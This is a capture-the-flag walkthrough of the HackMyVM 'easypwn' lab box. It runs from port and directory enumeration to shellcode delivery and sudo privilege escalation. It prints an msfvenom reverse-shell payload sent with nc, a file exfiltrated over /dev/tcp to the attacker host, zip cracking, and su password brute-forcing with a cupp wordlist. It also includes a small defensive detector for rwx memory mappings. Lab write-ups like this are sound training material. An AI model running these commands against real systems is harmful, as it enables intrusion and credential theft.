HMV-easypwn: Walkthrough Reproduction and Review

I didn't manage to solve this box on my own earlier, so after reading the writeup I'm going back over it step by step.

Port scanning

┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.80.228
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-23 23:30 CST
Nmap scan report for bogon (192.168.80.228)
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6666/tcp open irc
MAC Address: 0E:DC:E4:58:FA:C4 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

An unusual port is open: 6666.
Still, let's take a look at the web service first.

Web enumeration

Visiting the site directly just returns a line of text, so scan for directories as usual.

Enumerating directories on my server would ruin everything
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.80.228 -x php,txt,jpg,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.80.228
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,jpg,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mysecret.txt (Status: 200) [Size: 383]
Progress: 348076 / 1038220 (33.53%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 348268 / 1038220 (33.54%)
===============================================================
Finished
===============================================================

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228/mysecret.txt
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.


/YTlPX4d2UENbWnI.txt


That gives us another wordlist; use it to keep scanning and gather more information.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228//YTlPX4d2UENbWnI.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower


┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228//YTlPX4d2UENbWnI.txt > tmp.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 68 100 68 0 0 5682 0 --:--:-- --:--:-- --:--:-- 6181

┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower


┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w ./tmp.txt --url 192.168.80.228/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.80.228/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ./tmp.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 10 / 11 (90.91%)
/ll104567 (Status: 200) [Size: 739584]
===============================================================
Finished
===============================================================
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228//ll104567
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal
Warning: anyway, or consider "--output <FILE>" to save to a file.

┌──(root㉿kakeru)-[~/tmp]
└─# wget 192.168.80.228//ll104567
--2025-03-23 23:41:25-- http://192.168.80.228//ll104567
Connecting to 192.168.80.228:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 739584 (722K)
Saving to: ‘ll104567’

ll104567 100%[=============================================>] 722.25K --.-KB/s in 0.02s

2025-03-23 23:41:25 (32.4 MB/s) - ‘ll104567’ saved [739584/739584]


┌──(root㉿kakeru)-[~/tmp]
└─# file ll104567
ll104567: Zip archive data, at least v2.0 to extract, compression method=deflate

It's a password-protected zip file, so crack it with john.

┌──(root㉿kakeru)-[~/tmp]
└─# file ll104567
ll104567: Zip archive data, at least v2.0 to extract, compression method=deflate

┌──(root㉿kakeru)-[~/tmp]
└─# unzip ll104567
Archive: ll104567
[ll104567] opt/server password:

┌──(root㉿kakeru)-[~/tmp]
└─# mv ll104567 a.zip

┌──(root㉿kakeru)-[~/tmp]
└─# zip2john a.zip > hash
ver 2.0 efh 5455 efh 7875 a.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8

┌──(root㉿kakeru)-[~/tmp]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)

┌──(root㉿kakeru)-[~/tmp]
└─# john hash --show
a.zip/opt/server:oooooo:opt/server:a.zip::a.zip

1 password hash cracked, 0 left

Extracting it yields a binary; load it into IDA. The program listens on port 6666.
It checks whether the received data contains any of the bytes marked as "forbidden bytes" (forbidden_bytes); if it finds any, it rejects the connection and sends a warning message.
If the data is not rejected, the program maps it into memory and executes it, which is essentially running shellcode.
So the plan is to send shellcode to port 6666.
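As an added defender-side example (not code from the box or from this writeup), this is what the behaviour just described looks like from the outside: a process that maps received data writable and executable leaves an anonymous rwxp region in its /proc/<pid>/maps, and a byte denylist does nothing about that. The sample maps lines below are constructed; the /opt/server path is the one from the zip listing.

```python
import re

# One /proc/<pid>/maps line: "start-end perms offset dev inode [path]".
MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"[0-9a-f]+\s+\S+\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)


def suspicious_mappings(lines):
    """Return anonymous regions that are writable and executable at once.

    A listener that mmap()s client bytes with PROT_WRITE|PROT_EXEC and jumps
    into them (the pattern described above) shows up here as an rwxp region
    backed by no file (inode 0, no path).
    """
    hits = []
    for line in lines:
        m = MAPS_RE.match(line.strip())
        if not m:
            continue
        perms, path = m.group("perms"), m.group("path")
        anonymous = m.group("inode") == "0" and not path.startswith("/")
        if "w" in perms and "x" in perms and anonymous:
            start, end = int(m.group("start"), 16), int(m.group("end"), 16)
            hits.append({"start": start, "size": end - start,
                         "perms": perms, "path": path or "[anon]"})
    return hits


def scan_process(pid):
    """Scan one live process (Linux only); needs read access to its maps."""
    with open(f"/proc/{pid}/maps") as f:
        return suspicious_mappings(f)


# Constructed sample: what such a listener's maps might look like mid-exploit.
SAMPLE_MAPS = """\
5592a3c00000-5592a3c01000 r--p 00000000 08:01 131188 /opt/server
5592a3c01000-5592a3c02000 r-xp 00001000 08:01 131188 /opt/server
7f3c1e200000-7f3c1e201000 rwxp 00000000 00:00 0
7f3c1e400000-7f3c1e5c8000 r-xp 00000000 08:01 2097 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffd6a1e0000-7ffd6a201000 rw-p 00000000 00:00 0 [stack]
""".splitlines()

if __name__ == "__main__":
    for hit in suspicious_mappings(SAMPLE_MAPS):
        print(f"anonymous rwx mapping at {hit['start']:#x}, {hit['size']:#x} bytes")
```

The real fix for a service like this is to never map untrusted input executable at all; the check above only tells you which running process already does.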

Port 6666

Locate these forbidden_bytes in IDA.

The next step is generating the shellcode, using an msfvenom payload.

┌──(root㉿kakeru)-[~/tmp]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.80.11 LPORT=1234 -b '\x00,\x20,\x0f,\xcd,\x09,\x22,\x0a' -f raw > tmp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes

We get a shell back; -f raw is what produces the raw shellcode.

┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp | nc 192.168.80.228 6666

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=1001(lamb) gid=1001(lamb) groups=1001(lamb)

Privilege escalation

Getting the password

lamb@pwnding:/home/lamb$ ls
linpeas.sh suForce this_is_a_tips.txt use3e3e3e3e3sr.txt
lamb@pwnding:/home/lamb$ cat this_is_a_tips.txt
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.


The hint is to generate a wordlist with cupp, since running sudo requires the password.

cupp with only the name lamb didn't produce the password, so look for more information.

lamb@pwnding:~$ find /  -name '.*' -print 2>/dev/null | grep -Pv 'proc|run|sys'
/var/backups/.secret
/var/backups/.secret/.verysecret
/var/backups/.secret/.verysecret/.noooooo
/home/lamb/.viminfo
/home/lamb/.profile
/home/lamb/.bashrc
/home/lamb/.bash_logout
/home/lamb/.bash_history
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.d/.placeholder
/etc/cron.weekly/.placeholder
/etc/cron.monthly/.placeholder
/etc/skel/.profile
/etc/skel/.bashrc
/etc/skel/.bash_logout
/etc/.pwd.lock

lamb@pwnding:~$ cat /var/backups/.secret/.verysecret/.noooooo
cat: /var/backups/.secret/.verysecret/.noooooo: Is a directory
lamb@pwnding:~$ cd /var/backups/.secret/.verysecret/.noooooo
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ ls
note2.txt
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ cat note2.txt
The Compass and the Campfire

David knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David’s calloused fingers brushed the cracked compass in his palm—a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just… rerouting."

Jake’s eyes narrowed, too sharp for comfort. "Your compass is broken."

A chuckle escaped David, brittle as dry leaves. "Compasses don’t break, bud. They… forget." He flipped it open, the glass fogged with age. "See? North isn’t where it should be. It’s where it chooses to be tonight."

The boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake’s fear dissolved into giggles. David watched, throat tight. He’s still young enough to laugh at squirrels.

"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We’ve got supplies. Let’s build a fort."

They wove branches into a crooked shelter, Jake’s hands steady where David’s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it’d always point home."

Jake snapped the glowstick, bathing their fort in alien green. "Does it work now?"

The needle quivered, settling northwest. Toward the distant highway hum, not their cabin’s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake’s pocket—where a crumpled trail map peeked out, dotted with the boy’s doodled dinosaurs.

Dawn found them at the cabin’s porch, guided by Jake’s roars laughter and the squirrels he’d named "Sir Nibbles". The compass stayed in David’s pocket, its secret safe: true north had shifted years ago, anyway—from steel poles to a gap-toothed grin eating pancakes at 6 AM.

This is the second hint, and it contains names. Feed cupp the name david, the surname knelt, and the son's name jake to generate a wordlist,
then run it through suForce.

lamb@pwnding:~$ wget 192.168.80.11/david.txt
--2025-03-23 12:21:40-- http://192.168.80.11/david.txt
Connecting to 192.168.80.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3019 (2.9K) [text/plain]
Saving to: ‘david.txt’

david.txt 100%[=============================================>] 2.95K --.-KB/s in 0s

2025-03-23 12:21:40 (9.69 MB/s) - ‘david.txt’ saved [3019/3019]

lamb@pwnding:~$ su
su sudo sudoedit sudoreplay sum suspend
lamb@pwnding:~$ ./suForce -u lamb -w david.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | lamb
📖 Wordlist | david.txt
🔎 Status | 203/297/68%/ekaJ_2016
💥 Password | ekaJ_2016
───────────────────────────────────

Got the password. Next, analyze the program we can run with sudo.

lamb@pwnding:~$ sudo -l
[sudo] password for lamb:
Sorry, try again.
[sudo] password for lamb:
Matching Defaults entries for lamb on pwnding:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lamb may run the following commands on pwnding:
(ALL : ALL) PASSWD: /usr/local/bin/getroot

getroot

Pull the file to the local machine for analysis.

lamb@pwnding:~$ cat /usr/local/bin/getroot > /dev/tcp/192.168.80.11/1234

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > getroot

Load it into IDA as well. The program takes one argument, magic_number; if it is correct, it prints the contents of /root/cred.
Now just hand the main function and the generate_normal_distribution function to an AI and have it write code that produces the magic value, then pass that program's output to getroot to obtain the information.

lamb@pwnding:~$ sudo /usr/local/bin/getroot $(./a.out)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0

This is root's password.

Summary

  • On my first attempt I got stuck at obtaining the user password; it turned out I hadn't filled in the surname. Lesson learned.
  • This box was a chance to learn the tcp_reverse_shell payload for generating shellcode.
  • After getting started with pwn I'm a bit more comfortable with IDA, although this box didn't actually require any pwn.
  • Learned to find hidden files with find / -name '.*' -print 2>/dev/null | grep -Pv 'sys|run|proc'